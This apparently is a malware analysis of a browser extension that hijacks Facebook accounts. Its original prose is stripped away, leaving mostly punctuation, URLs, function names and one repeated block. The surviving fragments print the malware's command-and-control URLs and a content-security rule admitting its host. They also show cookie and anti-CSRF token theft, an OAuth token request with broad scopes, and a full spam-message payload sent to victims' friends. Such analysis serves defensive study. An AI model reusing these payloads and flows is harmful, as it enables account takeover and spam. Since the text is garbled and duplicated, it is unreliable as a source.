, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >" .
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .
Facebook , , . . .
, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker() .
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .PremiumCodec
adeaditi.info/kmain.jsChrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax-
bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,
uiToggle wrap, uiPopover. _5ce . , . , , Facebook .qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL
bmw5done.info/apostime.php — php- C&C . , , json, : link type. :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.link, «?», 20 , ajax-
www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .ajax-api graph.facebook.com .
facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :“&composertags_with[19]=<id_ >" .20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthdayuygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .Facebook , , . . .
, facebook.com, ,
babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .
qwecek() , C&C json.AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json
benimesaj() , :message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4,
babasker() ., Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >" .
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .
Facebook , , . . .
, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker() .
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .head . kmain.js - , . Facebook , , adeaditi.info/kmain.js- . , Firefox Facebook- .
PremiumCodecadeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'",
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax-bmw5done.info/qbrweq.js?, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,uiToggle wrap, uiPopover. _5ce. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URLbmw5done.info/apostime.php— php- C&C . , , json, : link type. :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-www.googleapis.com/urlshortener/v1/url. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .facebook.com/ajax/typeahead/place_tag_friends.phpjson . json , friends_fields, 20 :“&composertags_with[19]=<id_ >".
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthdayuygulamaizinver()ajax-, html, , action .duzenlevegonder(), , ,duzenlevegonder().
Facebook , , . . .
, facebook.com, ,babasker(),bmw5done.info/ag.php. php-, C&C, , API Facebook. json :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .qwecek(), C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c jsonbenimesaj(), :message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_.
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4,babasker().
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .head . kmain.js - , . Facebook , , adeaditi.info/kmain.js- . , Firefox Facebook- .
PremiumCodecadeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'",
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax-bmw5done.info/qbrweq.js?, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,uiToggle wrap, uiPopover. _5ce. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URLbmw5done.info/apostime.php— php- C&C . , , json, : link type. :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-www.googleapis.com/urlshortener/v1/url. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .facebook.com/ajax/typeahead/place_tag_friends.phpjson . json , friends_fields, 20 :“&composertags_with[19]=<id_ >".
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthdayuygulamaizinver()ajax-, html, , action .duzenlevegonder(), , ,duzenlevegonder().
Facebook , , . . .
, facebook.com, ,babasker(),bmw5done.info/ag.php. php-, C&C, , API Facebook. json :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .qwecek(), C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c jsonbenimesaj(), :message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_.
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4,babasker().
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
